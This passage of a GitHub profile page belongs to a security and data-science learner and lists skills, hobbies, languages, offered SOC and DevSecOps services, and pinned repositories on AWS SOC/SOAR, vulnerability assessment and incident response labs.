  • Plotly / Bokeh / Dash / Streamlit — interactive visualization, dashboards, and app-style reporting
  • Folium / GeoJSON — geospatial visualization exposure
  • Notebook Reporting — documenting technical insights clearly

📊 Statistics & ML Foundations

  • Descriptive Statistics — summarization and variability analysis
  • Probability Concepts — statistical reasoning
  • A/B Testing & Hypothesis Testing — experiment-style analysis
  • scikit-learn — ML foundations
  • Feature Engineering — preprocessing and transformation
  • Model Evaluation — comparing outputs and improving quality

🧠 Advanced Learning Foundations

  • NLP Concepts — text processing and language-oriented workflows
  • Time Series Concepts — trend and forecasting exposure
  • TensorFlow / Keras / PyTorch — deep learning foundations
  • CNN / RNN / Transformer Foundations — computer vision and sequence-model learning exposure
  • Analytical Thinking for Security — data-backed reasoning for security-adjacent workflows

🎯 Interests & Hobbies

🏀 Outdoor & Fitness 🎮 Gaming (PC)

🏀 Basketball — agility, movement & teamwork
🏋️ Gym — discipline, consistency & self-improvement
🏊 Swimming — endurance & focus
🐎 Horse Riding — balance, control & confidence

🚗 GTA V — strategy & exploration
FIFA — coordination & competitive gameplay


🧠 Professional Interests 📚 Continuous Learning

🛡 SOC Operations & Detection Engineering
☁️ AWS Security & IAM Automation
🤖 AI Security Automation & SOAR Workflows
🧬 GenAI Security, MCP/RAG & Detection-as-Code

📘 Hands-on labs & portfolio building
🧪 Real-world security simulations
🧠 Skill growth across SOC, cloud, AI, DevSecOps & automation
📈 Analytics-driven technical improvement


🌍 Languages

Urdu / Hindi Arabic English


🤝✨ Let’s Connect, Collaborate & Build Secure Systems ✨🤝

Typing SVG

💼 Professional Services

  • 🔍 SOC Monitoring & Alert Triage — Alert review, triage support, escalation notes, and analyst-style reporting.
  • 📊 Wazuh SIEM & Detection Support — Log visibility, rule/decoder support, dashboard checks, and detection workflow improvement.
  • 🧠 Threat Intelligence & IOC Enrichment — IOC review, enrichment, ATT&CK mapping, and investigation context building.
  • 📝 Incident Response Documentation — Case notes, timelines, containment tracking, lessons learned, and response reporting.
  • 🐧 Linux Security Hardening — SSH hardening, firewall setup, permissions, audit visibility, and service security checks.
  • 🌐 Web & Network Security Visibility — Web logs, WAF visibility, traffic review, Nmap/Wireshark analysis, and monitoring support.
  • 🧪 Vulnerability Review & Validation — Finding review, prioritization, hardening recommendations, and remediation documentation.
  • 🤖 AI Security Automation & n8n Workflows — Alert-to-case automation, AI-assisted triage, Slack/TheHive routing, and workflow prototyping.
  • ⚙️ Python / Bash / DevSecOps Automation — Helper scripts, log parsing, CLI tools, validation checks, and lightweight automation.
  • 📚 Technical Documentation & Portfolio Writing — GitHub READMEs, architecture writeups, project documentation, and technical presentation.

📧 Reach Out

🌟 If you find my work interesting, please consider:

Follow Follow LinkedIn Buy Me a Coffee


“In cybersecurity, continuous learning is not optional — it is survival.”
— Bruce Schneier

“A man who builds from scratch never fears loss, because what made him cannot be taken away: knowledge, experience, and resilience.”
— Mastering Manhood

Footer

Profile Views

Made with 💙 by Abdul Rehman

Last Updated: May 2026

Pinned Loading

  1. SOC-SOAR-ECOSYSTEM-AWS SOC-SOAR-ECOSYSTEM-AWS Public

    42-project AWS SOC/SOAR portfolio with Wazuh, TheHive, Cortex, MISP, n8n, AWS security, Terraform, detection engineering, IR, dashboards, and GenAI/MCP/RAG/agentic AI security automation.

    Python 2

  2. Vulnerability-Assessment-in-line-with-Various-Frameworks Vulnerability-Assessment-in-line-with-Various-Frameworks Public

    60 hands-on vulnerability assessment labs aligned with security frameworks, covering scanning, validation, risk prioritization, configuration auditing, and reporting.

    Shell 3

  3. Data-Science-With-Python Data-Science-With-Python Public

    Hands-on Data Science with Python portfolio built through 57 Google Colab labs across 8 sections, progressing from Python foundations and data wrangling to visualization, ML, NLP, forecasting, and …

    Jupyter Notebook 2

  4. AI-Advanced-Course-Portfolio AI-Advanced-Course-Portfolio Public

    Documentation-first portfolio of my full AI Advanced Course journey, covering AI foundations, ML, DL, transformers, and deployable Streamlit + LangChain RAG projects.

    Jupyter Notebook 1

  5. Hugging-Face-AI-Learning-Portfolio Hugging-Face-AI-Learning-Portfolio Public

    A documentation-first portfolio of my completed Hugging Face learning journey across Agents, LLM, and MCP, featuring practical implementations, certificates, notes, and production-style AI automati…

    Python 1

  6. Incident-Response-and-Adversary-Emulation Incident-Response-and-Adversary-Emulation Public

    20 Hands-on SOC and DFIR labs covering adversary emulation, detection engineering, forensics, case workflows, and end-to-end incident response execution.

    Shell 1